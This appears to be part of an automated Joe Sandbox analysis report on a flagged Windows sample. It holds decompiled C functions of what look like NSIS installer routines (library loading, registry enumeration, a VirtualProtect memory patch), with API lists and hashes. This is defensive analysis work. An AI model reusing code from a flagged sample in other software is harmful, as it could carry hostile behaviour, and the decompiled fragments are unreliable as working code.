                                                                        0x00407474
                                                                        0x00407474
                                                                        0x0040747b
                                                                        0x00407482
                                                                        0x00407489
                                                                        0x00407489
                                                                        0x00000000
                                                                        0x00407489
                                                                        0x00407458
                                                                        0x0040745b
                                                                        0x0040745e
                                                                        0x00407461
                                                                        0x00407468
                                                                        0x004073ac
                                                                        0x004073ac
                                                                        0x004073af
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407543
                                                                        0x00407546
                                                                        0x00407447
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040717d
                                                                        0x0040717f
                                                                        0x00407186
                                                                        0x00407187
                                                                        0x00407189
                                                                        0x0040718c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407194
                                                                        0x00407197
                                                                        0x0040719a
                                                                        0x0040719c
                                                                        0x0040719e
                                                                        0x0040719e
                                                                        0x0040719f
                                                                        0x004071a2
                                                                        0x004071a9
                                                                        0x004071ac
                                                                        0x004071ba
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407490
                                                                        0x00407490
                                                                        0x00407493
                                                                        0x0040749a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040749f
                                                                        0x0040749f
                                                                        0x004074a3
                                                                        0x004075db
                                                                        0x00000000
                                                                        0x004075db
                                                                        0x004074a9
                                                                        0x004074ac
                                                                        0x004074af
                                                                        0x004074b3
                                                                        0x004074b6
                                                                        0x004074bc
                                                                        0x004074be
                                                                        0x004074be
                                                                        0x004074be
                                                                        0x004074c1
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c7
                                                                        0x004074c7
                                                                        0x004074cb
                                                                        0x0040752b
                                                                        0x0040752e
                                                                        0x00407533
                                                                        0x00407534
                                                                        0x00407536
                                                                        0x00407538
                                                                        0x0040753b
                                                                        0x00407447
                                                                        0x00407447
                                                                        0x00000000
                                                                        0x0040744d
                                                                        0x00407447
                                                                        0x004074cd
                                                                        0x004074d3
                                                                        0x004074d6
                                                                        0x004074d9
                                                                        0x004074dc
                                                                        0x004074df
                                                                        0x004074e2
                                                                        0x004074e5
                                                                        0x004074e8
                                                                        0x004074eb
                                                                        0x004074ee
                                                                        0x00407507
                                                                        0x0040750a
                                                                        0x0040750d
                                                                        0x00407510
                                                                        0x00407514
                                                                        0x00407516
                                                                        0x00407516
                                                                        0x00407517
                                                                        0x0040751a
                                                                        0x004074f0
                                                                        0x004074f0
                                                                        0x004074f8
                                                                        0x004074fd
                                                                        0x004074ff
                                                                        0x00407502
                                                                        0x00407502
                                                                        0x0040751d
                                                                        0x00407524
                                                                        0x00000000
                                                                        0x00407526
                                                                        0x00000000
                                                                        0x00407526
                                                                        0x00000000
                                                                        0x004071c2
                                                                        0x004071c5
                                                                        0x004071fb
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732e
                                                                        0x0040732e
                                                                        0x00407331
                                                                        0x00407333
                                                                        0x004075bd
                                                                        0x00000000
                                                                        0x004075bd
                                                                        0x00407339
                                                                        0x0040733c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407342
                                                                        0x00407346
                                                                        0x00407349
                                                                        0x00407349
                                                                        0x00407349
                                                                        0x00000000
                                                                        0x00407349
                                                                        0x004071c7
                                                                        0x004071c9
                                                                        0x004071cb
                                                                        0x004071cd
                                                                        0x004071d0
                                                                        0x004071d1
                                                                        0x004071d3
                                                                        0x004071d5
                                                                        0x004071d8
                                                                        0x004071db
                                                                        0x004071f1
                                                                        0x004071f6
                                                                        0x0040722e
                                                                        0x0040722e
                                                                        0x00407232
                                                                        0x0040725e
                                                                        0x00407260
                                                                        0x00407267
                                                                        0x0040726a
                                                                        0x0040726d
                                                                        0x0040726d
                                                                        0x00407272
                                                                        0x00407272
                                                                        0x00407274
                                                                        0x00407277
                                                                        0x0040727e
                                                                        0x00407281
                                                                        0x004072ae
                                                                        0x004072ae
                                                                        0x004072b1
                                                                        0x004072b4
                                                                        0x00407328
                                                                        0x00407328
                                                                        0x00407328
                                                                        0x00000000
                                                                        0x00407328
                                                                        0x004072b6
                                                                        0x004072bc
                                                                        0x004072bf
                                                                        0x004072c2
                                                                        0x004072c5
                                                                        0x004072c8
                                                                        0x004072cb
                                                                        0x004072ce
                                                                        0x004072d1
                                                                        0x004072d4
                                                                        0x004072d7
                                                                        0x004072f0
                                                                        0x004072f2
                                                                        0x004072f5
                                                                        0x004072f6
                                                                        0x004072f9
                                                                        0x004072fb
                                                                        0x004072fe
                                                                        0x00407300
                                                                        0x00407302
                                                                        0x00407305
                                                                        0x00407307
                                                                        0x0040730a
                                                                        0x0040730e
                                                                        0x00407310
                                                                        0x00407310
                                                                        0x00407311
                                                                        0x00407314
                                                                        0x00407317
                                                                        0x004072d9
                                                                        0x004072d9
                                                                        0x004072e1
                                                                        0x004072e6
                                                                        0x004072e8
                                                                        0x004072eb
                                                                        0x004072eb
                                                                        0x0040731a
                                                                        0x00407321
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x00000000
                                                                        0x00407323
                                                                        0x00000000
                                                                        0x00407323
                                                                        0x00407321
                                                                        0x00407234
                                                                        0x00407237
                                                                        0x00407239
                                                                        0x0040723c
                                                                        0x0040723f
                                                                        0x00407242
                                                                        0x00407244
                                                                        0x00407247
                                                                        0x0040724a
                                                                        0x0040724a
                                                                        0x0040724d
                                                                        0x0040724d
                                                                        0x00407250
                                                                        0x00407257
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x00000000
                                                                        0x00407259
                                                                        0x00000000
                                                                        0x00407259
                                                                        0x00407257
                                                                        0x004071dd
                                                                        0x004071e0
                                                                        0x004071e2
                                                                        0x004071e5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406f44
                                                                        0x00406f44
                                                                        0x00406f48
                                                                        0x0040758d
                                                                        0x00000000
                                                                        0x0040758d
                                                                        0x00406f4e
                                                                        0x00406f51
                                                                        0x00406f54
                                                                        0x00406f57
                                                                        0x00406f5a
                                                                        0x00406f5d
                                                                        0x00406f60
                                                                        0x00406f62
                                                                        0x00406f65
                                                                        0x00406f68
                                                                        0x00406f6b
                                                                        0x00406f6d
                                                                        0x00406f6d
                                                                        0x00406f6d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004070cf
                                                                        0x004070cf
                                                                        0x004070d3
                                                                        0x00407599
                                                                        0x00000000
                                                                        0x00407599
                                                                        0x004070d9
                                                                        0x004070dc
                                                                        0x004070df
                                                                        0x004070e2
                                                                        0x004070e4
                                                                        0x004070e4
                                                                        0x004070e4
                                                                        0x004070e7
                                                                        0x004070ea
                                                                        0x004070ed
                                                                        0x004070f0
                                                                        0x004070f3
                                                                        0x004070f6
                                                                        0x004070f7
                                                                        0x004070f9
                                                                        0x004070f9
                                                                        0x004070f9
                                                                        0x004070fc
                                                                        0x004070ff
                                                                        0x00407102
                                                                        0x00407105
                                                                        0x00407105
                                                                        0x00407105
                                                                        0x00407108
                                                                        0x0040710a
                                                                        0x0040710a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040734c
                                                                        0x0040734c
                                                                        0x0040734c
                                                                        0x00407350
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407356
                                                                        0x00407359
                                                                        0x0040735c
                                                                        0x0040735f
                                                                        0x00407361
                                                                        0x00407361
                                                                        0x00407361
                                                                        0x00407364
                                                                        0x00407367
                                                                        0x0040736a
                                                                        0x0040736d
                                                                        0x00407370
                                                                        0x00407373
                                                                        0x00407374
                                                                        0x00407376
                                                                        0x00407376
                                                                        0x00407376
                                                                        0x00407379
                                                                        0x0040737c
                                                                        0x0040737f
                                                                        0x00407382
                                                                        0x00407385
                                                                        0x00407389
                                                                        0x0040738b
                                                                        0x0040738e
                                                                        0x00000000
                                                                        0x00407390
                                                                        0x0040710d
                                                                        0x0040710d
                                                                        0x00000000
                                                                        0x0040710d
                                                                        0x0040738e
                                                                        0x004075c3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406bf2
                                                                        0x004075fa
                                                                        0x004075fa
                                                                        0x00000000
                                                                        0x004075fa
                                                                        0x00407447
                                                                        0x004073ce
                                                                        0x004073cb

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                        • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                                        • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                        • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 60%
                                                                        			E004020D8(void* __ebx, void* __eflags) {
                                                                        				struct HINSTANCE__* _t23;
                                                                        				struct HINSTANCE__* _t31;
                                                                        				void* _t32;
                                                                        				WCHAR* _t35;
                                                                        				intOrPtr* _t36;
                                                                        				void* _t37;
                                                                        				void* _t39;
                                                                        
                                                                        				_t32 = __ebx;
                                                                        				asm("sbb eax, 0x42a320");
                                                                        				 *(_t39 - 4) = 1;
                                                                        				if(__eflags < 0) {
                                                                        					_push(0xffffffe7);
                                                                        					L15:
                                                                        					E00401423();
                                                                        					L16:
                                                                        					 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
                                                                        					return 0;
                                                                        				}
                                                                        				_t35 = E00402DA6(0xfffffff0);
                                                                        				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                                                        				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                                        					L3:
                                                                        					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                                        					_t47 = _t23 - _t32;
                                                                        					 *(_t39 + 8) = _t23;
                                                                        					if(_t23 == _t32) {
                                                                        						_push(0xfffffff6);
                                                                        						goto L15;
                                                                        					}
                                                                        					L4:
                                                                        					_t36 = E00406AA4(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                                        					if(_t36 == _t32) {
                                                                        						E004056CA(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                                        					} else {
                                                                        						 *(_t39 - 4) = _t32;
                                                                        						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                                        							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce58, 0x40a000); // executed
                                                                        						} else {
                                                                        							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                                        							if( *_t36() != 0) {
                                                                        								 *(_t39 - 4) = 1;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403CB7( *(_t39 + 8)) != 0) {
                                                                        						FreeLibrary( *(_t39 + 8));
                                                                        					}
                                                                        					goto L16;
                                                                        				}
                                                                        				_t31 = GetModuleHandleW(_t35); // executed
                                                                        				 *(_t39 + 8) = _t31;
                                                                        				if(_t31 != __ebx) {
                                                                        					goto L4;
                                                                        				}
                                                                        				goto L3;
                                                                        			}










                                                                        0x004020d8
                                                                        0x004020d8
                                                                        0x004020dd
                                                                        0x004020e4
                                                                        0x004021a3
                                                                        0x004022f1
                                                                        0x004022f1
                                                                        0x00402c2a
                                                                        0x00402c2d
                                                                        0x00402c39
                                                                        0x00402c39
                                                                        0x004020f3
                                                                        0x004020fd
                                                                        0x00402100
                                                                        0x00402110
                                                                        0x00402114
                                                                        0x0040211a
                                                                        0x0040211c
                                                                        0x0040211f
                                                                        0x0040219c
                                                                        0x00000000
                                                                        0x0040219c
                                                                        0x00402121
                                                                        0x0040212c
                                                                        0x00402130
                                                                        0x00402170
                                                                        0x00402132
                                                                        0x00402135
                                                                        0x00402138
                                                                        0x00402164
                                                                        0x0040213a
                                                                        0x0040213d
                                                                        0x00402146
                                                                        0x00402148
                                                                        0x00402148
                                                                        0x00402146
                                                                        0x00402138
                                                                        0x00402178
                                                                        0x00402191
                                                                        0x00402191
                                                                        0x00000000
                                                                        0x00402178
                                                                        0x00402103
                                                                        0x0040210b
                                                                        0x0040210e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                          • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,004030A8), ref: 00405725
                                                                          • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll), ref: 00405737
                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                        • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                        • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                        • String ID:
                                                                        • API String ID: 334405425-0
                                                                        • Opcode ID: eacc7f29ef9238f75312dc60e6ea6028a018b8bf669bd73802a6ecb2e4004895
                                                                        • Instruction ID: 1e7e134340f86907485d462c64894228b35b3344cd4f3d252167f9901203d809
                                                                        • Opcode Fuzzy Hash: eacc7f29ef9238f75312dc60e6ea6028a018b8bf669bd73802a6ecb2e4004895
                                                                        • Instruction Fuzzy Hash: C521C231904104FADF11AFA5CF48A9D7A70BF48354F60413BF605B91E0DBBD8A929A5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 59%
                                                                        			E00401B9B(void* __ebx) {
                                                                        				intOrPtr _t8;
                                                                        				void* _t9;
                                                                        				void _t12;
                                                                        				void* _t14;
                                                                        				void* _t22;
                                                                        				void* _t25;
                                                                        				void* _t30;
                                                                        				char* _t32;
                                                                        				void* _t33;
                                                                        				void* _t34;
                                                                        				void* _t37;
                                                                        
                                                                        				_t28 = __ebx;
                                                                        				_t8 =  *((intOrPtr*)(_t37 - 0x28));
                                                                        				_t33 =  *0x40ce58; // 0x738cd8
                                                                        				if(_t8 == __ebx) {
                                                                        					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
                                                                        						_t9 = GlobalAlloc(0x40, 0x804); // executed
                                                                        						_t34 = _t9;
                                                                        						_t5 = _t34 + 4; // 0x4
                                                                        						E004066A5(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
                                                                        						_t12 =  *0x40ce58; // 0x738cd8
                                                                        						 *_t34 = _t12;
                                                                        						 *0x40ce58 = _t34;
                                                                        					} else {
                                                                        						if(_t33 == __ebx) {
                                                                        							 *((intOrPtr*)(_t37 - 4)) = 1;
                                                                        						} else {
                                                                        							_t3 = _t33 + 4; // 0x738cdc
                                                                        							E00406668(_t30, _t3);
                                                                        							_push(_t33);
                                                                        							 *0x40ce58 =  *_t33;
                                                                        							GlobalFree();
                                                                        						}
                                                                        					}
                                                                        					goto L15;
                                                                        				} else {
                                                                        					while(1) {
                                                                        						_t8 = _t8 - 1;
                                                                        						if(_t33 == _t28) {
                                                                        							break;
                                                                        						}
                                                                        						_t33 =  *_t33;
                                                                        						if(_t8 != _t28) {
                                                                        							continue;
                                                                        						} else {
                                                                        							if(_t33 == _t28) {
                                                                        								break;
                                                                        							} else {
                                                                        								_t36 = _t33 + 4;
                                                                        								_t32 = L"Call";
                                                                        								E00406668(_t32, _t33 + 4);
                                                                        								_t22 =  *0x40ce58; // 0x738cd8
                                                                        								E00406668(_t36, _t22 + 4);
                                                                        								_t25 =  *0x40ce58; // 0x738cd8
                                                                        								_push(_t32);
                                                                        								_push(_t25 + 4);
                                                                        								E00406668();
                                                                        								L15:
                                                                        								 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t37 - 4));
                                                                        								_t14 = 0;
                                                                        							}
                                                                        						}
                                                                        						goto L17;
                                                                        					}
                                                                        					_push(0x200010);
                                                                        					_push(E004066A5(_t28, _t30, _t33, _t28, 0xffffffe8));
                                                                        					E00405CC8();
                                                                        					_t14 = 0x7fffffff;
                                                                        				}
                                                                        				L17:
                                                                        				return _t14;
                                                                        			}














                                                                        0x00401b9b
                                                                        0x00401b9b
                                                                        0x00401b9e
                                                                        0x00401ba6
                                                                        0x00401bef
                                                                        0x00401c1d
                                                                        0x00401c26
                                                                        0x00401c28
                                                                        0x00401c2c
                                                                        0x00401c31
                                                                        0x00401c36
                                                                        0x00401c38
                                                                        0x00401bf1
                                                                        0x00401bf3
                                                                        0x0040292e
                                                                        0x00401bf9
                                                                        0x00401bf9
                                                                        0x00401bfe
                                                                        0x00401c05
                                                                        0x00401c06
                                                                        0x00401c0b
                                                                        0x00401c0b
                                                                        0x00401bf3
                                                                        0x00000000
                                                                        0x00401ba8
                                                                        0x00401ba8
                                                                        0x00401ba8
                                                                        0x00401bab
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401bb1
                                                                        0x00401bb5
                                                                        0x00000000
                                                                        0x00401bb7
                                                                        0x00401bb9
                                                                        0x00000000
                                                                        0x00401bbf
                                                                        0x00401bbf
                                                                        0x00401bc2
                                                                        0x00401bc9
                                                                        0x00401bce
                                                                        0x00401bd8
                                                                        0x00401bdd
                                                                        0x00401be2
                                                                        0x00401be6
                                                                        0x00402a94
                                                                        0x00402c2a
                                                                        0x00402c2d
                                                                        0x00402c33
                                                                        0x00402c33
                                                                        0x00401bb9
                                                                        0x00000000
                                                                        0x00401bb5
                                                                        0x0040238a
                                                                        0x00402397
                                                                        0x00402398
                                                                        0x0040239d
                                                                        0x0040239d
                                                                        0x00402c35
                                                                        0x00402c39

                                                                        APIs
                                                                        • GlobalFree.KERNEL32 ref: 00401C0B
                                                                        • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                                          • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                          • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp\System.dll,00000000), ref: 004068A4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocFreelstrcatlstrlen
                                                                        • String ID: Call
                                                                        • API String ID: 3292104215-1824292864
                                                                        • Opcode ID: 3f020652b54f4aff84369af85c552add0977b8bccae4eada2093d63fb928b3c4
                                                                        • Instruction ID: d74cddccbdd50a14e5bf5e3e63826a63b2a65df0fd836753f00777670cd3b466
                                                                        • Opcode Fuzzy Hash: 3f020652b54f4aff84369af85c552add0977b8bccae4eada2093d63fb928b3c4
                                                                        • Instruction Fuzzy Hash: 5321D872904210DBDB20EFA4DEC4E5E73A4AB047157150A3BF542F72D0D6BD9C518BAD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
                                                                        				void* _t9;
                                                                        				int _t10;
                                                                        				long _t13;
                                                                        				int* _t16;
                                                                        				intOrPtr _t21;
                                                                        				short* _t22;
                                                                        				void* _t24;
                                                                        				void* _t26;
                                                                        				void* _t29;
                                                                        
                                                                        				_t22 = __edi;
                                                                        				_t21 = __edx;
                                                                        				_t16 = __ebx;
                                                                        				_t9 = E00402DE6(_t29, 0x20019); // executed
                                                                        				_t24 = _t9;
                                                                        				_t10 = E00402D84(3);
                                                                        				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
                                                                        				 *__edi = __ebx;
                                                                        				if(_t24 == __ebx) {
                                                                        					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                        				} else {
                                                                        					 *(_t26 + 8) = 0x3ff;
                                                                        					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
                                                                        						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx); // executed
                                                                        						__eflags = _t13;
                                                                        						if(_t13 != 0) {
                                                                        							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                        						}
                                                                        					} else {
                                                                        						RegEnumKeyW(_t24, _t10, __edi, 0x3ff);
                                                                        					}
                                                                        					_t22[0x3ff] = _t16;
                                                                        					_push(_t24); // executed
                                                                        					RegCloseKey(); // executed
                                                                        				}
                                                                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t26 - 4));
                                                                        				return 0;
                                                                        			}












                                                                        0x0040259e
                                                                        0x0040259e
                                                                        0x0040259e
                                                                        0x004025a3
                                                                        0x004025aa
                                                                        0x004025ac
                                                                        0x004025b4
                                                                        0x004025b7
                                                                        0x004025ba
                                                                        0x0040292e
                                                                        0x004025c0
                                                                        0x004025c8
                                                                        0x004025cb
                                                                        0x004025e4
                                                                        0x004025ea
                                                                        0x004025ec
                                                                        0x004025ee
                                                                        0x004025ee
                                                                        0x004025cd
                                                                        0x004025d1
                                                                        0x004025d1
                                                                        0x004025f5
                                                                        0x004025fc
                                                                        0x004025fd
                                                                        0x004025fd
                                                                        0x00402c2d
                                                                        0x00402c39

                                                                        APIs
                                                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                        • RegEnumValueW.KERNELBASE ref: 004025E4
                                                                        • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsyEAEC.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Enum$CloseValue
                                                                        • String ID:
                                                                        • API String ID: 397863658-0
                                                                        • Opcode ID: a1dccb7ad5de8b03bade15b30a27ed1347f7b9d3a9e9f0d0aeacb5a18eef0a99
                                                                        • Instruction ID: fdd171a53236be04b49e80cc8c25aaf428e2db1c32e81cf7e645575326a8d696
                                                                        • Opcode Fuzzy Hash: a1dccb7ad5de8b03bade15b30a27ed1347f7b9d3a9e9f0d0aeacb5a18eef0a99
                                                                        • Instruction Fuzzy Hash: 35017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61D0EBB85E45966D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                        
                                                                        				 *0x72495048 = _a4;
                                                                        				if(_a8 == 1) {
                                                                        					VirtualProtect(0x7249505c, 4, 0x40, 0x7249504c); // executed
                                                                        					 *0x7249505c = 0xc2;
                                                                        					 *0x7249504c = 0;
                                                                        					 *0x72495054 = 0;
                                                                        					 *0x72495068 = 0;
                                                                        					 *0x72495058 = 0;
                                                                        					 *0x72495050 = 0;
                                                                        					 *0x72495060 = 0;
                                                                        					 *0x7249505e = 0;
                                                                        				}
                                                                        				return 1;
                                                                        			}



                                                                        0x72492a88
                                                                        0x72492a8d
                                                                        0x72492a9d
                                                                        0x72492aa5
                                                                        0x72492aac
                                                                        0x72492ab1
                                                                        0x72492ab6
                                                                        0x72492abb
                                                                        0x72492ac0
                                                                        0x72492ac5
                                                                        0x72492aca
                                                                        0x72492aca
                                                                        0x72492ad2

                                                                        APIs
                                                                        • VirtualProtect.KERNELBASE(7249505C,00000004,00000040,7249504C), ref: 72492A9D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.883195763.0000000072491000.00000020.00000001.01000000.00000006.sdmp, Offset: 72490000, based on PE: true
                                                                        • Associated: 00000000.00000002.883191252.0000000072490000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883203445.0000000072494000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883208180.0000000072496000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72490000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID: `gv@Mv
                                                                        • API String ID: 544645111-3191811104
